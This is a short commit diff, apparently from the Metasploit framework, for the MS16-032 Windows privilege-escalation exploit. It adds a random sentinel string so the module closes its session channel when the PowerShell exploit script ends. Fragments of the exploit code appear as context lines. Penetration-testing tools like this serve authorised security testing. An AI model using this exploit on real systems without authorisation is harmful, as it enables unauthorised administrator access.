Add a random sentinel to close channel when terminates (#1)

* Add a random sentinel to close channel when terminates * Replace spaces with tabs to be consistent * Remove unnecessary escaped quotes and use include? instead of regex
2024-07-18 18:31:41 +02:00 · 2020-01-25 23:30:49 +01:00 · 2020-01-25 23:30:49 +01:00 · 3491da7da0
commit 3491da7da0
parent 756879d3d6
2 changed files with 4 additions and 0 deletions
--- a/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
+++ b/data/exploits/CVE-2016-0099/cve_2016_0099.ps1
@ -354,6 +354,7 @@
 			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
 			$StartTokenRace.Stop()
 			$SafeGuard.Stop()
+			echo "$end"
 			Return
 		}
 			
--- a/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
+++ b/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb
@ -126,6 +126,8 @@ class MetasploitModule < Msf::Exploit::Local
    ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
    #lpcommandLine - capped at 1024b
    ms16_032.gsub!("$args1","\"#{psh_cmd}\"")
+    end_flag = Rex::Text.rand_text_alphanumeric(32)
+    ms16_032.gsub!("$end", end_flag)

    print_status('Compressing script contents...')
    ms16_032_c = compress_script(ms16_032)
@ -160,6 +162,7 @@ class MetasploitModule < Msf::Exploit::Local

      while(d = r.channel.read)
        print(d)
+        break if d.include? end_flag
      end
      r.channel.close
      r.close